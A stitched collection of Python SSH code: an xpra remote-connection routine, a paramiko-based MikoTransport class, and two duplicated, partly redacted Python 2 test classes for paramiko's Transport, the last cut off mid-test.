            key = None
            try:
                key = key_class.from_private_key_file(keyfile_path)
            except PasswordRequiredException:
                log("%s keyfile requires a passphrase", keyfile_path)
                passphrase = input_pass("please enter the passphrase for %s:" % (keyfile_path,))
                if passphrase:
                    try:
                        key = key_class.from_private_key_file(keyfile_path, passphrase)
                    except (SSHException, IOError) as e:
                        log("from_private_key_file", exc_info=True)
                        log.info("cannot load key from file '%s':", keyfile_path)
                        log.info(" %s", e)
            except (SSHException, IOError) as e:
                # unreadable or malformed key file: skip it instead of aborting
                # the whole authentication sequence
                log("from_private_key_file", exc_info=True)
                log.info("cannot load key from file '%s':", keyfile_path)
                log.info(" %s", e)
            if key:
                log("auth_publickey using %s: %s", keyfile_path, keymd5(key))
                try:
                    transport.auth_publickey(username, key)
                except SSHException as e:
                    log("key '%s' rejected", keyfile_path, exc_info=True)
                    log.info("SSH authentication using key '%s' failed:", keyfile_path)
                    log.info(" %s", e)
                else:
                    if transport.is_authenticated():
                        break

    def auth_none():
        log("trying none authentication")
        try:
            transport.auth_none(username)
        except SSHException:
            log("auth_none()", exc_info=True)

    def auth_password():
        log("trying password authentication")
        try:
            transport.auth_password(username, password)
        except SSHException as e:
            log("auth_password(..)", exc_info=True)
            log.info("SSH password authentication failed: %s", e)

    banner = transport.get_banner()
    if banner:
        log.info("SSH server banner:")
        for x in banner.splitlines():
            log.info(" %s", x)

    log("starting authentication")
    if not transport.is_authenticated() and NONE_AUTH:
        auth_none()

    if not transport.is_authenticated() and PASSWORD_AUTH and password:
        auth_password()

    if not transport.is_authenticated() and AGENT_AUTH:
        auth_agent()

    if not transport.is_authenticated() and KEY_AUTH:
        auth_publickey()

    if not transport.is_authenticated() and PASSWORD_AUTH and not password:
        for _ in range(1+PASSWORD_RETRY):
            # auth_password() reads the rebound 'password' from this scope
            password = input_pass("please enter the SSH password for %s@%s" % (username, host))
            if not password:
                break
            auth_password()
            if transport.is_authenticated():
                break
    if not transport.is_authenticated():
        transport.close()
        raise InitException("SSH Authentication failed")

    assert len(remote_xpra)>0
    log("will try to run xpra from: %s", remote_xpra)
    for xpra_cmd in remote_xpra:
        try:
            chan = transport.open_session(window_size=None, max_packet_size=0, timeout=60)
            chan.set_name("find %s" % xpra_cmd)
        except SSHException as e:
            log("open_session", exc_info=True)
            raise InitException("failed to open SSH session: %s" % e)
        cmd = "which %s" % xpra_cmd
        log("exec_command('%s')", cmd)
        chan.exec_command(cmd)
        #poll until the command terminates:
        start = monotonic_time()
        while not chan.exit_status_ready():
            if monotonic_time()-start>10:
                chan.close()
                raise InitException("SSH test command '%s' timed out" % cmd)
            log("exit status is not ready yet, sleeping")
            time.sleep(0.01)
        r = chan.recv_exit_status()
        log("exec_command('%s')=%s", cmd, r)
        chan.close()
        if r!=0:
            continue
        cmd = xpra_cmd + " " + " ".join(shellquote(x) for x in proxy_command)
        if socket_dir:
            cmd += " \"--socket-dir=%s\"" % socket_dir
        if display_as_args:
            cmd += " "
            cmd += " ".join(shellquote(x) for x in display_as_args)
        log("cmd(%s, %s)=%s", proxy_command, display_as_args, cmd)

        #see https://github.com/paramiko/paramiko/issues/175
        #WINDOW_SIZE = 2097152
        log("trying to open SSH session, window-size=%i, timeout=%i", WINDOW_SIZE, TIMEOUT)
        try:
            chan = transport.open_session(window_size=WINDOW_SIZE, max_packet_size=0, timeout=TIMEOUT)
            chan.set_name("run-xpra")
        except SSHException as e:
            log("open_session", exc_info=True)
            raise InitException("failed to open SSH session: %s" % e)
        else:
            log("channel exec_command(%s)", cmd)
            chan.exec_command(cmd)
            info = {
                "host" : host,
                "port" : port,
            }
            conn = SSHSocketConnection(chan, sock, target, info)
            conn.timeout = SOCKET_TIMEOUT
            conn.start_stderr_reader()
            child = None
            conn.process = (child, "ssh", cmd)
            return conn
    raise Exception("all SSH remote proxy commands have failed")
class MikoTransport(Transport):
    def __init__(
        self,
        host: str,
        port: int = -1,
        auth_username: str = "",
        auth_private_key: str = "",
        auth_password: str = "",
        auth_strict_key: bool = True,
        timeout_socket: int = 5,
        timeout_transport: int = 5,
        timeout_exit: bool = True,
        ssh_config_file: str = "",
        ssh_known_hosts_file: str = "",
    ) -> None:
        """
        MikoTransport Object

        Inherit from Transport ABC
        MikoTransport <- Transport (ABC)

        Args:
            host: host ip/name to connect to
            port: port to connect to; -1 means use the ssh config port, else 22
            auth_username: username for authentication; falls back to ssh config user
            auth_private_key: path to private key for authentication; falls back to ssh
                config identity file
            auth_password: password for authentication
            auth_strict_key: True/False to enforce strict key checking (default is True)
            timeout_socket: timeout for establishing socket in seconds
            timeout_transport: timeout for ssh transport in seconds
            timeout_exit: True/False close transport if timeout encountered
            ssh_config_file: string to path for ssh config file
            ssh_known_hosts_file: string to path for ssh known hosts file

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        cfg_port, cfg_user, cfg_private_key = self._process_ssh_config(host, ssh_config_file)

        if port == -1:
            port = cfg_port or 22

        super().__init__(
            host,
            port,
            timeout_socket,
            timeout_transport,
            timeout_exit,
        )

        self.auth_username: str = auth_username or cfg_user
        self.auth_private_key: str = auth_private_key or cfg_private_key
        self.auth_password: str = auth_password
        self.auth_strict_key: bool = auth_strict_key
        self.ssh_known_hosts_file: str = ssh_known_hosts_file

        # annotated only; assigned in open() / _open_channel()
        self.session: ParamikoTransport
        self.channel: Channel

        self.socket = Socket(host=self.host, port=self.port, timeout=self.timeout_socket)

    @staticmethod
    def _process_ssh_config(host: str, ssh_config_file: str) -> Tuple[Optional[int], str, str]:
        """
        Method to parse ssh config file

        In the future this may move to be a 'helper' function as it should be very similar between
        paramiko and and ssh2-python... for now it can be a static method as there may be varying
        supported args between the two transport drivers.

        Args:
            host: host to lookup in ssh config file
            ssh_config_file: string path to ssh config file; passed down from `Scrape`, or the
                `NetworkDriver` or subclasses of it, in most cases.

        Returns:
            Tuple: port to use for ssh (may be None), username to use for ssh (or ""),
                identity file (private key) to use for ssh auth (or "")

        Raises:
            N/A

        """
        ssh = SSHConfig(ssh_config_file)
        host_config = ssh.lookup(host)
        return host_config.port, host_config.user or "", host_config.identity_file or ""

    def open(self) -> None:
        """
        Parent method to open session, authenticate and acquire shell

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            Exception: if socket handshake fails
            ScrapliAuthenticationFailed: if all authentication means fail

        """
        if not self.socket.socket_isalive():
            self.socket.socket_open()
        try:
            self.session = ParamikoTransport(self.socket.sock)
            self.session.start_client()
        except Exception as exc:
            LOG.critical(f"Failed to complete handshake with host {self.host}; Exception: {exc}")
            raise

        if self.auth_strict_key:
            LOG.debug(f"Attempting to validate {self.host} public key")
            self._verify_key()

        self._authenticate()
        if not self._isauthenticated():
            msg = f"Authentication to host {self.host} failed"
            LOG.critical(msg)
            raise ScrapliAuthenticationFailed(msg)
        self._open_channel()

    def _verify_key(self) -> None:
        """
        Verify target host public key, raise exception if invalid/unknown

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            KeyVerificationFailed: if host is not in known hosts
            KeyVerificationFailed: if host is in known hosts but public key does not match

        """
        known_hosts = SSHKnownHosts(self.ssh_known_hosts_file)

        if self.host not in known_hosts.hosts.keys():
            raise KeyVerificationFailed(f"{self.host} not in known_hosts!")

        remote_server_key = self.session.get_remote_server_key()
        remote_public_key = remote_server_key.get_base64()

        if known_hosts.hosts[self.host]["public_key"] != remote_public_key:
            raise KeyVerificationFailed(
                f"{self.host} in known_hosts but public key does not match!"
            )

    def _authenticate(self) -> None:
        """
        Parent method to try all means of authentication

        Public key auth is tried first when a private key is configured; password auth
        follows only if both username and password are set.

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            ScrapliAuthenticationFailed: if authentication fails

        """
        if self.auth_private_key:
            self._authenticate_public_key()
            if self._isauthenticated():
                LOG.debug(f"Authenticated to host {self.host} with public key auth")
                return
        if not self.auth_password or not self.auth_username:
            msg = (
                f"Failed to authenticate to host {self.host} with private key "
                f"`{self.auth_private_key}`. Unable to continue authentication, "
                "missing username, password, or both."
            )
            LOG.critical(msg)
            raise ScrapliAuthenticationFailed(msg)
        self._authenticate_password()
        if self._isauthenticated():
            LOG.debug(f"Authenticated to host {self.host} with password")

    def _authenticate_public_key(self) -> None:
        """
        Attempt to authenticate with public key authentication

        Failures are logged, not raised; the caller checks `_isauthenticated`.

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        try:
            # only RSA private keys are supported here
            paramiko_key = RSAKey(filename=self.auth_private_key)
            self.session.auth_publickey(self.auth_username, paramiko_key)
        except AuthenticationException as exc:
            LOG.critical(
                f"Public key authentication with host {self.host} failed. Exception: {exc}."
            )
        except Exception as exc:  # pylint: disable=W0703
            LOG.critical(
                "Unknown error occurred during public key authentication with host "
                f"{self.host}; Exception: {exc}"
            )

    def _authenticate_password(self) -> None:
        """
        Attempt to authenticate with password authentication

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            Exception: if unknown (i.e. not auth failed) exception occurs

        """
        try:
            self.session.auth_password(self.auth_username, self.auth_password)
        except AuthenticationException as exc:
            LOG.critical(
                f"Password authentication with host {self.host} failed. Exception: {exc}."
                "\n\tNote: Paramiko automatically attempts both standard auth as well as keyboard "
                "interactive auth. Paramiko exception about bad auth type may be misleading!"
            )
        except Exception as exc:
            LOG.critical(
                "Unknown error occurred during password authentication with host "
                f"{self.host}; Exception: {exc}"
            )
            raise

    def _isauthenticated(self) -> bool:
        """
        Check if session is authenticated

        Args:
            N/A

        Returns:
            bool: True if authenticated, else False

        Raises:
            N/A

        """
        authenticated: bool = self.session.is_authenticated()
        return authenticated

    def _open_channel(self) -> None:
        """
        Open channel, acquire pty, request interactive shell

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        self.channel = self.session.open_session()
        self.set_timeout(self.timeout_transport)
        self.channel.get_pty()
        self.channel.invoke_shell()
        LOG.debug(f"Channel to host {self.host} opened")

    def close(self) -> None:
        """
        Close channel, paramiko session and socket

        Safe to call when `open` did not complete: objects that were never created
        are skipped.

        Args:
            N/A

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        channel = getattr(self, "channel", None)
        if channel is not None:
            channel.close()
            LOG.debug(f"Channel to host {self.host} closed")
        session = getattr(self, "session", None)
        if session is not None:
            # stop the paramiko Transport explicitly rather than relying on the
            # socket being closed underneath it
            session.close()
        self.socket.socket_close()

    def isalive(self) -> bool:
        """
        Check if socket is alive and session is authenticated

        Args:
            N/A

        Returns:
            bool: True if socket is alive and session authenticated, else False (also False
                when no session has been opened yet)

        Raises:
            N/A

        """
        session = getattr(self, "session", None)
        if session is None:
            return False
        return bool(
            self.socket.socket_isalive() and session.is_alive() and self._isauthenticated()
        )

    def read(self) -> bytes:
        """
        Read data from the channel

        Args:
            N/A

        Returns:
            bytes: up to 65535 bytes read from channel

        Raises:
            N/A

        """
        channel_read: bytes = self.channel.recv(65535)
        return channel_read

    def write(self, channel_input: str) -> None:
        """
        Write data to the channel

        Args:
            channel_input: string to send to channel

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        self.channel.send(channel_input)  # type: ignore

    def set_timeout(self, timeout: int) -> None:
        """
        Set session timeout

        Args:
            timeout: timeout in seconds

        Returns:
            N/A  # noqa: DAR202

        Raises:
            N/A

        """
        self.channel.settimeout(timeout)
class TransportTest (unittest.TestCase):
    """
    Loopback tests for paramiko's Transport.

    Each test wires a client Transport (``self.tc``) and a server Transport
    (``self.ts``) to a pair of linked LoopSockets, so both ends of the SSH
    connection run in-process.

    NOTE(review): Python 2-only syntax is used below (the ``L`` long-integer
    suffix in test_2_compute_key and ``except SSHException, x:`` in
    test_B_exec_command); this class is a SyntaxError under Python 3.
    NOTE(review): ``assertEquals``/``assert_`` were removed in Python 3.12 and
    ``Event.isSet`` is a deprecated alias of ``is_set``.
    NOTE(review): this module defines ``TransportTest`` more than once; only the
    last definition stays bound to the name, so earlier ones are not picked up
    by unittest's loader.
    NOTE(review): usernames/passwords appear redacted ('******') in this copy
    while some assertions expect 'slowdive'; as written those assertions would
    not hold.
    """

    def setUp(self):
        """Create linked loopback sockets and a Transport on each end."""
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        """Close both transports, then both loopback sockets."""
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def setup_test_server(self):
        """
        Start ``self.ts`` as a server with ``self.server`` (a NullServer), then
        connect and password-authenticate ``self.tc`` against it.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        # Key rebuilt from str(host_key); presumably only the public part
        # survives the round trip -- confirm against paramiko's PKey.__str__.
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        self.server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, self.server)
        self.tc.connect(hostkey=public_host_key)
        self.tc.auth_password(username='******', password='******')
        # start_server sets the event once negotiation completes (1s timeout).
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_1_security_options(self):
        """
        Verify SecurityOptions: known ciphers can be assigned, an unknown cipher
        name raises ValueError, and a non-tuple value (23) raises TypeError.
        """
        o = self.tc.get_security_options()
        self.assertEquals(type(o), SecurityOptions)
        self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        try:
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
            self.assert_(False)
        except ValueError:
            pass
        try:
            o.ciphers = 23
            self.assert_(False)
        except TypeError:
            pass

    def test_2_compute_key(self):
        """
        Verify Transport._compute_key: with fixed K, H and session_id, deriving
        32 bytes for id 'C' must reproduce a known hex digest.
        """
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929L
        self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3')
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEquals('207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper())

    def test_3_simple(self):
        """
        Verify that we can establish an ssh link with ourselves across the
        loopback sockets. This is hardly "simple", but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        # Neither side has a user or is authenticated before the handshake.
        self.assertEquals(None, self.tc.get_username())
        self.assertEquals(None, self.ts.get_username())
        self.assertEquals(False, self.tc.is_authenticated())
        self.assertEquals(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())
        self.assertEquals('slowdive', self.tc.get_username())
        self.assertEquals('slowdive', self.ts.get_username())
        self.assertEquals(True, self.tc.is_authenticated())
        self.assertEquals(True, self.ts.is_authenticated())

    def test_4_special(self):
        """
        Verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        # Client options must be restricted before connect() negotiates.
        options = self.tc.get_security_options()
        options.ciphers = ('aes256-cbc',)
        options.digests = ('hmac-md5-96',)
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())
        self.assertEquals('aes256-cbc', self.tc.local_cipher)
        self.assertEquals('aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits, i.e. 12 bytes.
        self.assertEquals(12, self.tc.packetizer.get_mac_size_out())
        self.assertEquals(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        Verify that the keepalive will be sent.
        """
        self.tc.set_hexdump(True)

        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

        # No global request has reached the server yet.
        self.assertEquals(None, getattr(server, '_global_request', None))
        self.tc.set_keepalive(1)
        # Sleep past the 1-second keepalive interval so one is sent.
        time.sleep(2)
        # NOTE(review): expected request name appears redacted in this copy.
        self.assertEquals('*****@*****.**', server._global_request)

    def test_6_bad_auth_type(self):
        """
        Verify that we get the right exception when an unsupported auth
        type is requested.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        try:
            self.tc.connect(hostkey=public_host_key, username='******', password='******')
            self.assert_(False)
        except:
            # Bare except also catches the assert_(False) AssertionError; the
            # type check below then fails the test in that case.
            etype, evalue, etb = sys.exc_info()
            self.assertEquals(BadAuthenticationType, etype)
            self.assertEquals(['publickey'], evalue.allowed_types)

    def test_7_bad_password(self):
        """
        Verify that a bad password gets the right exception, and that a retry
        with the right password works.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        try:
            self.tc.auth_password(username='******', password='******')
            self.assert_(False)
        except:
            etype, evalue, etb = sys.exc_info()
            self.assert_(issubclass(etype, SSHException))
        # Retry on the same transport.
        self.tc.auth_password(username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_8_multipart_auth(self):
        """
        Verify that multipart auth works: password auth leaves 'publickey'
        still required, and a DSS key completes authentication.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        remain = self.tc.auth_password(username='******', password='******')
        self.assertEquals(['publickey'], remain)
        key = DSSKey.from_private_key_file('tests/test_dss.key')
        remain = self.tc.auth_publickey(username='******', key=key)
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_9_interactive_auth(self):
        """
        Verify keyboard-interactive auth works.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)

        def handler(title, instructions, prompts):
            # Record what the server asked, then answer every prompt with 'cat'.
            self.got_title = title
            self.got_instructions = instructions
            self.got_prompts = prompts
            return ['cat']
        remain = self.tc.auth_interactive('commie', handler)
        self.assertEquals(self.got_title, 'password')
        self.assertEquals(self.got_prompts, [('Password', False)])
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_A_interactive_auth_fallback(self):
        """
        Verify that a password auth attempt will fall back to "interactive"
        if password auth isn't supported but interactive is.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        remain = self.tc.auth_password('commie', 'cat')
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_B_exec_command(self):
        """
        Verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        # Presumably NullServer rejects the command 'no' -- inferred from the
        # expected SSHException; confirm against NullServer.
        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        try:
            chan.exec_command('no')
            self.assert_(False)
        except SSHException, x:
            pass

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        # stdout and stderr arrive on separate file objects by default.
        f = chan.makefile()
        self.assertEquals('Hello there.\n', f.readline())
        self.assertEquals('', f.readline())
        f = chan.makefile_stderr()
        self.assertEquals('This is on stderr.\n', f.readline())
        self.assertEquals('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEquals('Hello there.\n', f.readline())
        self.assertEquals('This is on stderr.\n', f.readline())
        self.assertEquals('', f.readline())
class TransportTest(unittest.TestCase):
    """
    Loopback tests for paramiko's Transport.

    Each test wires a client Transport (``self.tc``) and a server Transport
    (``self.ts``) to a pair of linked LoopSockets, so both ends of the SSH
    connection run in-process.

    NOTE(review): Python 2-only syntax is used below (the ``L`` long-integer
    suffix in test_2_compute_key and ``except SSHException, x:`` in
    test_B_exec_command); this class is a SyntaxError under Python 3.
    NOTE(review): ``assertEquals``/``assert_`` were removed in Python 3.12 and
    ``Event.isSet`` is a deprecated alias of ``is_set``.
    NOTE(review): this module defines ``TransportTest`` more than once, with
    essentially identical bodies; only the last definition stays bound to the
    name, so earlier ones are not picked up by unittest's loader.
    NOTE(review): usernames/passwords appear redacted ('******') in this copy
    while some assertions expect 'slowdive'; as written those assertions would
    not hold.
    """

    def setUp(self):
        """Create linked loopback sockets and a Transport on each end."""
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        """Close both transports, then both loopback sockets."""
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def setup_test_server(self):
        """
        Start ``self.ts`` as a server with ``self.server`` (a NullServer), then
        connect and password-authenticate ``self.tc`` against it.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        # Key rebuilt from str(host_key); presumably only the public part
        # survives the round trip -- confirm against paramiko's PKey.__str__.
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        self.server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, self.server)
        self.tc.connect(hostkey=public_host_key)
        self.tc.auth_password(username='******', password='******')
        # start_server sets the event once negotiation completes (1s timeout).
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_1_security_options(self):
        """
        Verify SecurityOptions: known ciphers can be assigned, an unknown cipher
        name raises ValueError, and a non-tuple value (23) raises TypeError.
        """
        o = self.tc.get_security_options()
        self.assertEquals(type(o), SecurityOptions)
        self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        try:
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
            self.assert_(False)
        except ValueError:
            pass
        try:
            o.ciphers = 23
            self.assert_(False)
        except TypeError:
            pass

    def test_2_compute_key(self):
        """
        Verify Transport._compute_key: with fixed K, H and session_id, deriving
        32 bytes for id 'C' must reproduce a known hex digest.
        """
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929L
        self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3')
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEquals(
            '207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
            hexlify(key).upper())

    def test_3_simple(self):
        """
        Verify that we can establish an ssh link with ourselves across the
        loopback sockets. This is hardly "simple", but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        # Neither side has a user or is authenticated before the handshake.
        self.assertEquals(None, self.tc.get_username())
        self.assertEquals(None, self.ts.get_username())
        self.assertEquals(False, self.tc.is_authenticated())
        self.assertEquals(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())
        self.assertEquals('slowdive', self.tc.get_username())
        self.assertEquals('slowdive', self.ts.get_username())
        self.assertEquals(True, self.tc.is_authenticated())
        self.assertEquals(True, self.ts.is_authenticated())

    def test_4_special(self):
        """
        Verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        # Client options must be restricted before connect() negotiates.
        options = self.tc.get_security_options()
        options.ciphers = ('aes256-cbc', )
        options.digests = ('hmac-md5-96', )
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())
        self.assertEquals('aes256-cbc', self.tc.local_cipher)
        self.assertEquals('aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits, i.e. 12 bytes.
        self.assertEquals(12, self.tc.packetizer.get_mac_size_out())
        self.assertEquals(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        Verify that the keepalive will be sent.
        """
        self.tc.set_hexdump(True)

        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key, username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

        # No global request has reached the server yet.
        self.assertEquals(None, getattr(server, '_global_request', None))
        self.tc.set_keepalive(1)
        # Sleep past the 1-second keepalive interval so one is sent.
        time.sleep(2)
        # NOTE(review): expected request name appears redacted in this copy.
        self.assertEquals('*****@*****.**', server._global_request)

    def test_6_bad_auth_type(self):
        """
        Verify that we get the right exception when an unsupported auth
        type is requested.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        try:
            self.tc.connect(hostkey=public_host_key, username='******', password='******')
            self.assert_(False)
        except:
            # Bare except also catches the assert_(False) AssertionError; the
            # type check below then fails the test in that case.
            etype, evalue, etb = sys.exc_info()
            self.assertEquals(BadAuthenticationType, etype)
            self.assertEquals(['publickey'], evalue.allowed_types)

    def test_7_bad_password(self):
        """
        Verify that a bad password gets the right exception, and that a retry
        with the right password works.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        try:
            self.tc.auth_password(username='******', password='******')
            self.assert_(False)
        except:
            etype, evalue, etb = sys.exc_info()
            self.assert_(issubclass(etype, SSHException))
        # Retry on the same transport.
        self.tc.auth_password(username='******', password='******')
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_8_multipart_auth(self):
        """
        Verify that multipart auth works: password auth leaves 'publickey'
        still required, and a DSS key completes authentication.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        remain = self.tc.auth_password(username='******', password='******')
        self.assertEquals(['publickey'], remain)
        key = DSSKey.from_private_key_file('tests/test_dss.key')
        remain = self.tc.auth_publickey(username='******', key=key)
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
